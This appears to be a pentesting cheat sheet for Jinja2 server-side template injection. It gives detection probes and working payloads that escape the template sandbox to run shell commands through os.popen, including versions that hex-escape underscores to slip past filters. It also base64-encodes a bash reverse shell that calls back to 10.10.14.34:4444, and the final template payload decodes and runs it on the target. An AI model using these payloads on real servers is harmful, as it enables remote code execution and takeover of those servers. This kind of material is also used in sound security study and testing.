Jinja SSTI

SSTI => Server Side Template Injection

Jinja2

Detect
{{7*'7'}} # resolve to 7777777
{{7*a}} # probably will crash the app (error 500)
{{config}} # dump config
{{'A'.lower()}} # resolve to 'a'
Execute bash command with os module :
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("bash -c 'ls'").read()}}{%endif%}{%endfor%}

{{request.application.__globals__.__builtins__.__import__('os').popen("id").read()}}

{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls')|attr('read')()%}{%print(a)%}{%endwith%}
# Converting to base64
echo -n ls | base64
bHM=

# Payload
{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('echo bHM=|base64 -d|bash')|attr('read')()%}{%print(a)%}{%endwith%}
cat <<'EOF'|base64 -w 0
bash -i >& /dev/tcp/10.10.14.34/4444 0>&1
EOF

{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zNC80NDQ0IDA+JjEK|base64 -d|bash')|attr('read')()%}{%print(a)%}{%endwith%}

Tool